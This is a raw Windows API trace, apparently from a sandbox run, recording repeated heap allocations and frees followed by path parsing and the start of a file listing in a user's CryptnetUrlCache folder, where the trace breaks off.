(HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0194.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0194.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.450] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0194.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.451] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0194.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0194.451] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0194.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d423d0 [0194.451] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0194.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.451] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.451] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.451] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.451] PathFindFileNameW (pszPath="") returned="" [0194.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0194.451] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, 